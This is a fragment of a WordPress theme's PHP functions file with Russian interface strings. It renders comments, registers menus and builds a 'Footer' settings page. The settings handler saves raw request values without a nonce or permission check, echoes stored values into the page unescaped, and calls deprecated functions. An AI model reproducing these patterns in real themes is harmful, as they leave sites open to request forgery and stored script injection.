		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
